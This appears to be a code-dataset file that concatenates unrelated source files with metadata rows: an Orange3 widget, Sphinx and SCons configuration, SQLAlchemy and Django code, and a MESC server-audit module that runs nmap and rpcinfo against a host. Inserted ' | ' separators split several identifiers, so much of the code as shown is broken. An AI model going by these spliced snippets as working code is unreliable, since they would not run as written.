# if s1 == s2:
# return True
# if len(s1) != len(s2):
# return False
# ls = len(s1)
# letters = [0] * 26
# for i in range(ls):
# letters[ord(s1[i]) - ord('a')] += 1
# letters[ord(s2[i]) - ord('a')] -= 1
# for i in range(26):
# if letters[i] != 0:
# return False
# dp = [[[False] * ls for i in range(ls)] for i in range(ls + 1)]
# for i in range(ls):
# for j in range(ls):
# dp[1][i][j] = (s1[i] == s2[j])
#
# for cur_len in range(2, ls + 1):
# for i in range(ls - cur_len + 1):
# for j in range(ls - cur_len + 1):
# dp[cur_len][i][j] = False
# for k in range(1, cur_len):
# if dp[cur_len][i][j]:
# break
# dp[cur_len][i][j] = dp[cur_len][i][j] or (dp[k][i][j] and dp[cur_len - k][i + k][j + k])
# dp[cur_len][i][j] = dp[cur_len][i][j] or (dp[k][i + cur_len - k][j] and dp[cur_len - k][i][j + k])
# return dp[ls][0][0]
|
cheral/orange3 | Orange/widgets/data/owcreateclass.py | Python | bsd-2-clause | 20,686 | 0.000242 | """Widget for creating classes from non-numeric attribute by substrings"""
import re
from itertools import count
import numpy as np
from AnyQt.QtWidgets import QGridLayout, QLabel, QLineEdit, QSizePolicy
from AnyQt.QtCore import QSize, Qt
from Orange.data import StringVariable, DiscreteVariable, Domain
from Orange.data.table import Table
from Orange.statistics.util import bincount
from Orange.preprocess.transformation import Transformation, Lookup
from Orange.widgets import gui, widget
from Orange.widgets.settings import DomainContextHandler, ContextSetting
from Orange.widgets.utils.itemmodels import DomainModel
from Orange.widgets.widget import Msg
def map_by_substring(a, patterns, case_sensitive, match_beginning):
"""
Map values in a using a list of patterns. The patterns are considered in
order of appearance.
Args:
a (np.array): input array of `dtype` `str`
patterns (list of str): list of stirngs
case_sensitive (bool): case sensitive match
match_beginning (bool): match only at the beginning of the string
Returns:
np.array of floats representing indices of matched patterns
"""
res = np.full(len(a), np.nan)
if not case_sensitive:
a = np.char.lower(a)
patterns = (pattern.lower() for pattern in patterns)
for val_idx, pattern in reversed(list(enumerate(patterns))):
indices = np.char.find(a, pattern)
matches = indices == 0 if match_beginning else indices != -1
res[matches] = val_idx
return res
class ValueFromStringSubstring(Transformation):
"""
Transformation that computes a discrete variable from a string variable by
pattern matching.
Given patterns `["abc", "a", "bc", ""]`, string data
`["abcd", "aa", "bcd", "rabc", "x"]` is transformed to values of the new
attribute with indices`[0, 1, 2, 0, 3]`.
Args:
variable (:obj:`~Orange.data.StringVariable`): the original variable
patterns (list of str): list of string patterns
case_sensitive (bool, optional): if set to `True`, the match is case
sensitive
match_beginning (bool, optional): if set to `True`, the pattern must
appear at the beginning of the string
"""
def __init__(self, variable, patterns,
case_sensitive=False, match_beginning=False):
super().__init__(variable)
self.patterns = patterns
self.case_sensitive = case_sensitive
self.match_beginning = match_beginning
def transform(self, c): |
"""
Transform the given data.
Args:
c (np.array): an array of type that can be cast to dtype `str`
Returns:
np.array of floats representing indices of matched patterns
"""
nans = np.equal(c, None)
c = c.astype(str)
c[nans] = ""
res = map_by_substring(
c, self.patterns, self.case_sensitive, self.match_beginning)
res[nans] = np.nan
return res
class ValueFromDiscre | teSubstring(Lookup):
"""
Transformation that computes a discrete variable from discrete variable by
pattern matching.
Say that the original attribute has values
`["abcd", "aa", "bcd", "rabc", "x"]`. Given patterns
`["abc", "a", "bc", ""]`, the values are mapped to the values of the new
attribute with indices`[0, 1, 2, 0, 3]`.
Args:
variable (:obj:`~Orange.data.DiscreteVariable`): the original variable
patterns (list of str): list of string patterns
case_sensitive (bool, optional): if set to `True`, the match is case
sensitive
match_beginning (bool, optional): if set to `True`, the pattern must
appear at the beginning of the string
"""
def __init__(self, variable, patterns,
case_sensitive=False, match_beginning=False):
super().__init__(variable, [])
self.case_sensitive = case_sensitive
self.match_beginning = match_beginning
self.patterns = patterns # Finally triggers computation of the lookup
def __setattr__(self, key, value):
"""__setattr__ is overloaded to recompute the lookup table when the
patterns, the original attribute or the flags change."""
super().__setattr__(key, value)
if hasattr(self, "patterns") and \
key in ("case_sensitive", "match_beginning", "patterns",
"variable"):
self.lookup_table = map_by_substring(
self.variable.values, self.patterns,
self.case_sensitive, self.match_beginning)
class OWCreateClass(widget.OWWidget):
name = "Create Class"
description = "Create class attribute from a string attribute"
icon = "icons/CreateClass.svg"
category = "Data"
keywords = ["data"]
inputs = [("Data", Table, "set_data")]
outputs = [("Data", Table)]
want_main_area = False
settingsHandler = DomainContextHandler()
attribute = ContextSetting(None)
class_name = ContextSetting("class")
rules = ContextSetting({})
match_beginning = ContextSetting(False)
case_sensitive = ContextSetting(False)
TRANSFORMERS = {StringVariable: ValueFromStringSubstring,
DiscreteVariable: ValueFromDiscreteSubstring}
class Warning(widget.OWWidget.Warning):
no_nonnumeric_vars = Msg("Data contains only numeric variables.")
def __init__(self):
super().__init__()
self.data = None
# The following lists are of the same length as self.active_rules
#: list of pairs with counts of matches for each patter when the
# patterns are applied in order and when applied on the entire set,
# disregarding the preceding patterns
self.match_counts = []
#: list of list of QLineEdit: line edit pairs for each pattern
self.line_edits = []
#: list of QPushButton: list of remove buttons
self.remove_buttons = []
#: list of list of QLabel: pairs of labels with counts
self.counts = []
combo = gui.comboBox(
self.controlArea, self, "attribute", label="From column: ",
box=True, orientation=Qt.Horizontal, callback=self.update_rules,
model=DomainModel(valid_types=(StringVariable, DiscreteVariable)))
# Don't use setSizePolicy keyword argument here: it applies to box,
# not the combo
combo.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed)
patternbox = gui.vBox(self.controlArea, box=True)
#: QWidget: the box that contains the remove buttons, line edits and
# count labels. The lines are added and removed dynamically.
self.rules_box = rules_box = QGridLayout()
patternbox.layout().addLayout(self.rules_box)
box = gui.hBox(patternbox)
gui.button(
box, self, "+", callback=self.add_row, autoDefault=False, flat=True,
minimumSize=(QSize(20, 20)))
gui.rubber(box)
self.rules_box.setColumnMinimumWidth(1, 70)
self.rules_box.setColumnMinimumWidth(0, 10)
self.rules_box.setColumnStretch(0, 1)
self.rules_box.setColumnStretch(1, 1)
self.rules_box.setColumnStretch(2, 100)
rules_box.addWidget(QLabel("Name"), 0, 1)
rules_box.addWidget(QLabel("Substring"), 0, 2)
rules_box.addWidget(QLabel("#Instances"), 0, 3, 1, 2)
self.update_rules()
gui.lineEdit(
self.controlArea, self, "class_name",
label="Name for the new class:",
box=True, orientation=Qt.Horizontal)
optionsbox = gui.vBox(self.controlArea, box=True)
gui.checkBox(
optionsbox, self, "match_beginning", "Match only at the beginning",
callback=self.options_changed)
gui.checkBox(
optionsbox, self, "case_sensitive", "Case sensitive",
callback=self.options_changed)
layout = QGridLayout()
gui.widgetBox(self.controlArea, orientation=layout)
for i in range(3):
layout.setColumnStretch(i, 1)
layout.addWidg |
schacki/cookiecutter-django | {{cookiecutter.project_slug}}/docs/conf.py | Python | bsd-3-clause | 8,166 | 0.00147 | # -*- coding: utf-8 -*-
#
# {{ cookiecutter.project_name }} documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = '{{ cookiecutter.project_name }}'
copyright = """{% now 'utc', '%Y' %}, {{ cookiecutter.author_name }}"""
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be | used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additiona | l_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = '{{ cookiecutter.project_slug }}doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'{{ cookiecutter.project_slug }}.tex',
'{{ cookiecutter.project_name }} Documentation',
"""{{ cookiecutter.author_name }}""", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', '{{ cookiecutter.project_slug }}', '{{ cookiecutter.project_name }} Documentation',
["""{{ cookiecutter.author_name }}"""], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', '{{ cookiecutter.project_slug }}', '{{ cookiecutter.project_name }} Documentation',
"""{{ cookiecutter.author_name }}""", '{{ cookiecutter.project_name }}',
"""{{ cookiecutter.description }}""", 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
|
bilke/OpenSG-1.8 | SConsLocal/scons-local-0.96.1/SCons/Platform/win32.py | Python | lgpl-2.1 | 13,583 | 0.006331 | """SCons.Platform.win32
Platform-specific initialization for Win32 systems.
There normally shouldn't be any need to import this module directly. It
will usually be imported through the generic SCons.Platform.Platform()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "/home/scons/scons/branch.0/baseline/src/engine/SCons/Platform/win32.py 0.96.1.D001 2004/08/23 09:55:29 knight"
import os
import os.path
import string
import sys
import tempfile
from SCons.Platform.posix import exitvalmap
# XXX See note below about why importing SCons.Action should be
# eventually refactored.
import SCons.Action
import SCons.Util
class TempFileMunge:
"""A callable class. You can set an Environment variable to this,
then call it with a string argument, then it will perform temporary
file substitution on it. This is used to circumvent the win32 long command
line limitation.
Example usage:
env["TEMPFILE"] = TempFileMunge
env["LINKCOM"] = "${TEMPFILE('$LINK $TARGET $SOURCES')}"
"""
def __init__(self, cmd):
self.cmd = cmd
def __call__(self, target, source, env, for_signature):
if for_signature:
return self.cmd
cmd = env.subst_list(self.cmd, 0, target, source)[0]
try:
maxline = int(env.subst('$MAXLINELENGTH'))
except ValueError:
maxline = 2048
if (reduce(lambda x, y: x + len(y), cmd, 0) + len(cmd)) <= maxline:
return self.cmd
else:
# We do a normpath because mktemp() has what appears to be
# a bug in Win32 that will use a forward slash as a path
# delimiter. Win32's link mistakes that for a command line
# switch and barfs.
#
# We use the .lnk suffix for the benefit of the Phar Lap
# linkloc linker, which likes to append an .lnk suffix if
# none is given.
tmp = os.path.normpath(tempfile.mktemp('.lnk'))
native_tmp = SCons.Util.get_native_path(tmp)
if env['SHELL'] and env['SHELL'] == 'sh':
# The sh shell will try to escape the backslashes in the
# path, so unescape them.
native_tmp = string.replace(native_tmp, '\\', r'\\\\')
# In Cygwin, we want to use rm to delete the temporary
# file, because del does not exist in the sh shell.
rm = env.Detect('rm') or 'del'
else:
# Don't use 'rm' if the shell is not sh, because rm won't
# work with the win32 shells (cmd.exe or command.com) or
# win32 path names.
rm = 'del'
args = map(SCons.Util.quote_spaces, cmd[1:])
open(tmp, 'w').write(string.join(args, " ") + "\n")
# XXX Using the SCons.Action.print_actions value directly
# like this is bogus, but expedient. This class should
# really be rewritten as an Action that defines the
# __call__() and strfunction() methods and lets the
# normal action-execution logic handle whether or not to
# print/execute the action. The problem, though, is all
# of that is decided before we execute this method as
# part of expanding the $TEMPFILE construction variable.
# Consequently, refactoring this will have to wait until
# we get more flexible with allowing Actions to exist
# independently and get strung together arbitrarily like
# Ant tasks. In the meantime, it's going to be more
# user-friendly to not let obsession with architectural
# purity get in the way of just being helpful, so we'll
# reach into SCons.Action directly.
if SCons.Action.print_actions:
print("Using tempfile "+native_tmp+" for command line:\n"+
str(cmd[0]) + " " + string.join(args," "))
return [ cmd[0], '@' + native_tmp + '\n' + rm, native_tmp ]
# The upshot of all this is that, if you are using Python 1.5.2,
# you had better have cmd or command.com in your PATH when you run
# scons.
def piped_spawn(sh, escape, cmd, args, env, stdout, stderr):
# There is no direct way to do that in python. What we do |
# here should work for most cases:
# In case stdout (stderr) is not redirected to a file,
# we redirect it into a temporary file tmpFileStdout
# (tmpFileStderr) and copy the contents of t | his file
# to stdout (stderr) given in the argument
if not sh:
sys.stderr.write("scons: Could not find command interpreter, is it in your PATH?\n")
return 127
else:
# one temporary file for stdout and stderr
tmpFileStdout = os.path.normpath(tempfile.mktemp())
tmpFileStderr = os.path.normpath(tempfile.mktemp())
# check if output is redirected
stdoutRedirected = 0
stderrRedirected = 0
for arg in args:
# are there more possibilities to redirect stdout ?
if (string.find( arg, ">", 0, 1 ) != -1 or
string.find( arg, "1>", 0, 2 ) != -1):
stdoutRedirected = 1
# are there more possibilities to redirect stderr ?
if string.find( arg, "2>", 0, 2 ) != -1:
stderrRedirected = 1
# redirect output of non-redirected streams to our tempfiles
if stdoutRedirected == 0:
args.append(">" + str(tmpFileStdout))
if stderrRedirected == 0:
args.append("2>" + str(tmpFileStderr))
# actually do the spawn
try:
args = [sh, '/C', escape(string.join(args)) ]
ret = os.spawnve(os.P_WAIT, sh, args, env)
except OSError, e:
# catch any error
ret = exitvalmap[e[0]]
if stderr != None:
stderr.write("scons: %s: %s\n" % (cmd, e[1]))
# copy child output from tempfiles to our streams
# and do clean up stuff
if stdout != None and stdoutRedirected == 0:
try:
stdout.write(open( tmpFileStdout, "r" ).read())
os.remove( tmpFileStdout )
except (IOError, OSError):
pass
if stderr != None and stderrRedirected == 0:
try:
stderr.write(open( tmpFileStderr, "r" ).read())
os.remove( tmpFileStderr )
except (IOError, OSError):
pass
return ret
def spawn(sh, escape, cmd, args, env):
if not sh:
sys.stderr.write("scons: Could not find command interpreter, is it in your PATH?\n")
return 127
else:
try:
args = [sh, '/C', escape(string.join(args)) ]
ret = os.spawnve(os.P_WAIT, sh, args, env)
except OSError, e:
ret = exitvalmap[e[0]]
sys.stderr.write("scons: %s: %s\n" % (cmd, e[1]))
return ret
# Windows does not allow special characters in file names anyway, so
# no n |
rnixx/chronotope | src/chronotope/model/facility.py | Python | gpl-2.0 | 4,882 | 0 | from chronotope.model.base import PublicationWorkflowBehavior
from chronotope.model.base import SQLBase
from chronotope.model.category import CategoryRecord
from chronotope.model.location import LocationRecord
from chronotope.utils import ensure_uuid
from chronotope.utils import html_index_transform
from cone.app.model import Metadata
from cone.app.model import Properties
from cone.app.model import node_info
from cone.sql import get_session
from cone.sql import metadata
from cone.sql.model import GUID
from cone.sql.model import SQLRowNode
from cone.sql.model import SQLTableNode
from node.utils import instance_property
from plumber import plumbing
from pyramid.i18n import TranslationStringFactory
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy.orm import relationship
_ = TranslationStringFactory('chronotope')
facility_location_references = Table(
'facility_location_references',
metadata,
Column('facility_uid', GUID, ForeignKey('facility.uid')),
Column('location_uid', GUID, ForeignKey('location.uid'))
)
facility_category_references = Table(
'facility_category_references',
metadata,
Column('facility_uid', GUID, ForeignKey('facility.uid')),
Column('category_uid', GUID, ForeignKey('category.uid'))
)
class FacilityRecord(SQLBase):
__tablename__ = 'facility'
__index_attrs__ = ['title', 'description']
__index_transforms__ = {
'description': html_index_transform,
}
uid = Column(GUID, primary_key=True)
submitter = Column(String)
creator = Column(String)
created = Column(DateTime)
modified = Column(DateTime)
state = Column(String)
title = Column(String)
description = Column(String)
exists_from = Column(String)
exists_to = Column(String)
category = relationship(
CategoryRecord,
secondary=facility_category_references,
backref='facility')
location = relationship(
LocationRecord,
secondary=facility_location_references,
backref='facility')
def facility_by_uid(request, uid):
session = get_session(request)
return session.query(FacilityRecord).get(ensure_uuid(uid))
def facilities_by_uid(request, uids):
if not uids:
return list()
uids = [ensure_uuid(uid) for uid in uids]
session = get_session(request)
return session.query(FacilityRecord)\
.filter(FacilityRecord.uid.in_(uids))\
.all()
def search_facilities(request, term, state=[], submitter=None, limit=None):
session = get_session(request)
query = session.query(FacilityRecord)
query = query.filter(FacilityRecord.title.like(u'%{0}%'.format(term)))
if state:
query = query.filter(FacilityRecord.state.in_(state))
if submitter:
query = query.filter(FacilityRecord.submitter == submitter)
query = query.order_by(FacilityRecord.title)
if limit is not None:
query = query.limit(limit)
return query.all()
@node_info(
name='facility',
title=_('facility_label', default='Facility'),
description=_('facility_description', default='A Facility'),
icon='glyphicon glyphicon-home')
@plumbing(PublicationWorkflowBehavior)
class Facility(SQLRowNode):
record_class = FacilityRecord
@instance_property
def properties(self):
props = super(Fa | cility, self).properties
props.action_up = True
props.action_up_tile = 'listing'
props.action_view = True
props.action_edit = True
props.action_delete = True
return props
@property
def metadata(self):
md = Metad | ata()
md.title = self.attrs['title']
md.description = self.attrs['description']
md.creator = self.attrs['creator']
md.created = self.attrs['created']
md.modified = self.attrs['modified']
return md
@node_info(
name='facilities',
title=_('facilities_label', default='Facilities'),
description=_(
'facilities_description',
default='Container for Facilities'
),
icon='glyphicon glyphicon-record',
addables=['facility'])
class Facilities(SQLTableNode):
record_class = FacilityRecord
child_factory = Facility
@instance_property
def properties(self):
props = Properties()
props.in_navtree = True
props.action_up = True
props.action_up_tile = 'content'
props.action_add = True
props.default_content_tile = 'listing'
return props
@instance_property
def metadata(self):
md = Metadata()
md.title = _('facilities_label', default='Facilities')
md.description = _(
'facilities_description',
default='Container for Facilities'
)
return md
|
Opendigitalradio/etisnoop | yamlexample.py | Python | gpl-3.0 | 401 | 0.002494 | #!/usr/bin/env python
#
# An | example on how to read the YAML output from etisnoop
# Pipe etisnoop to this script
#
# License: public domain
import sys
import yaml
for frame in yaml.load_all(sys.stdin):
print("FIGs in frame {}".format(frame['Frame']))
for fib in frame['LIDATA']['FIC']:
if fib['FIGs']:
for fig in fib['FIGs']:
print(" FIG " + fig['FI | G'])
|
diofeher/django-nfa | tests/regressiontests/views/urls.py | Python | bsd-3-clause | 1,686 | 0.016014 | from os import path
from django.conf.urls.defaul | ts import *
from models import *
import views
base_dir = path.dirname(path.abspath(__file__))
media_dir = path.join(base_dir, 'media')
locale_dir = path.join(base_dir, 'locale')
js_info_dict = {
'domain': 'djangojs',
'packages': ('regressiontests.views',),
}
date_based_info_dict = {
'queryset': Article.objects.all(),
'date_field': 'date_created',
'month_format': '%m', |
}
urlpatterns = patterns('',
(r'^$', views.index_page),
# Default views
(r'^shortcut/(\d+)/(.*)/$', 'django.views.defaults.shortcut'),
(r'^non_existing_url/', 'django.views.defaults.page_not_found'),
(r'^server_error/', 'django.views.defaults.server_error'),
# i18n views
(r'^i18n/', include('django.conf.urls.i18n')),
(r'^jsi18n/$', 'django.views.i18n.javascript_catalog', js_info_dict),
# Static views
(r'^site_media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': media_dir}),
# Date-based generic views
(r'^date_based/object_detail/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/$',
'django.views.generic.date_based.object_detail',
dict(slug_field='slug', **date_based_info_dict)),
(r'^date_based/object_detail/(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/allow_future/$',
'django.views.generic.date_based.object_detail',
dict(allow_future=True, slug_field='slug', **date_based_info_dict)),
(r'^date_based/archive_month/(?P<year>\d{4})/(?P<month>\d{1,2})/$',
'django.views.generic.date_based.archive_month',
date_based_info_dict),
)
|
1modm/mesc | include/serverinfo/tcpip.py | Python | bsd-3-clause | 7,349 | 0.004726 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__license__ = """
███╗ ███╗███████╗███████╗ ██████╗
████╗ ████║██╔════╝██╔════╝██╔════╝
██╔████╔██║█████╗ ███████╗██║
██║╚██╔╝██║██╔══╝ ╚════██║██║
██║ ╚═╝ ██║███████╗███████║╚██████╗
╚═╝ ╚═╝╚══════╝╚══════╝ ╚═════╝
MESC: Minimun Essential Security Checks
Author: https://twitter.com/1_mod_m/
Project site: https://github.com/1modm/mesc
Copyright (c) 2007-2015, Miguel Morillo
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of copyright holders nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
#------------------------------------------------------------------------------
# Modules
#------------------------------------------------------------------------------
import os
import json
from . import config
from .operations import execute_cmd, OS_dist, exists_read_file
__all__ = [
"fire"
]
#------------------------------------------------------------------------------
def fire(__host__, __user__, __passwd__, __port__, __jsonfile__, __subfolder__):
"""
:returns: Output security check from json file
:params: Target, User, Passwd, Port and Json file
"""
if (__subfolder__ == "include/serverinfo/net/"):
__file__ = __subfolder__+__jsonfile__
else:
__file__ = __subfolder__+"/"+__jsonfile__
with open(__file__) as data_file:
data = json.loads(data_file.read())
__help_result__ = data["help_result"]
__command__ = data["command"]
__distribution__, __env_shell__ = OS_dist(__host__, __user__, __passwd__, __port__)
__type__ = data["type"]
if __type__ == "execute_cmd":
__cmd__ = data["distribution"][__distribution__]["cmd"]
if (data["check"] == "nmap"):
__cmd__ = __cmd__ + " " + __host__
if (data["check"] == "rpcinfo"):
__cmd__ = __cmd__ + " " + __host__
__output__, __command_check__ = execute_cmd(__cmd__, __env_shell__ , __host__, __user__, __passwd__, __port__)
if __type__ == "exists_read_file":
__file__ = data["distribution"][__distribution__]["file"]
__cmd_check__, __output__ = exists_read_file(__file__, __env_shell__, __host__, __user__, __passwd__, __port__)
if (__cmd_check__):
__command_check__ = config.CHECKRESULTOK
__cmd__ = __file__
else:
__command_check__ = config.CHECKRESULTERROR
__cmd__ = __file__
if __type__ == "check_file_exact":
__file__ = data["distribution"][__distribution__]["file"]
__check__ = [data["distribution"][__distribution__]["chk"]]
__cmd_check__, __output__ = exists_read_file(__file__, __env_shell__, __host__, __user__, __passwd__, __port__)
if not __cmd_check__:
__command_check__ = config.CHECKRESULTERROR
__cmd__ = __file__
else:
__command_check__, __line__, __linehtml__, __check_count__ =\
check_file_exact(__file__, __check__, __env_shell__, __host__, __user__, __passwd__,
__port__)
if (data["level"] != ""):
__level__ = int(data["level"])
if (__command_check__ == config.CHECKRESULTWARNING and __level__ > config.VALUECRITICAL):
__command_check__ = config.CHECKRESULTCRITICAL
__recommendations__ = data["recommendations"]
if __command_check__ == config.CHECKRESULTCRITICAL:
| __output__ = __recommendations__
else:
__output__ = config.CHECKRESULTOK
__cmd__ = __file__
if __type__ == "check_file_exact_load":
__file__ = data["distribution"][__distribution__]["file"]
__check__ = [data["distribution"][__distribution__]["chk"]]
__cmd_check__, __output__ = exists_read_file(__file__, __env_shel | l__, __host__, __user__, __passwd__, __port__)
if not __cmd_check__:
__command_check__ = config.CHECKRESULTERROR
__cmd__ = __file__
else:
__command_check__, __line__, __linehtml__, __check_count__ =\
check_file_exact(__file__, __check__, __env_shell__, __host__, __user__, __passwd__,
__port__)
__cmd__ = __file__
if __command_check__ == config.CHECKRESULTOK:
__check_message__ = data["result"]["checkresultok"]["check_message"]
__check_html_message__ = data["result"]["checkresultok"]["check_html_message"]
elif __command_check__ == config.CHECKRESULTWARNING:
__check_message__ = data["result"]["checkresultwarning"]["check_message"]
__check_html_message__ = data["result"]["checkresultwarning"]["check_html_message"]
elif __command_check__ == config.CHECKRESULTCRITICAL:
__check_message__ = data["result"]["checkresultcritical"]["check_message"]
__check_html_message__ = data["result"]["checkresultcritical"]["check_html_message"]
elif __command_check__ == config.CHECKRESULTERROR:
__check_message__ = data["result"]["checkresulterror"]["check_message"]
__check_html_message__ = data["result"]["checkresulterror"]["check_html_message"]
return (__output__.decode("ascii", "ignore"), __help_result__, __command_check__, __check_message__,
__check_html_message__, __command__, __cmd__)
|
adcomp/super-fruit-pie | tuto/06_collect.py | Python | mit | 7,778 | 0.0027 | #!/usr/bin/python
# -*- coding: utf-8 -*-
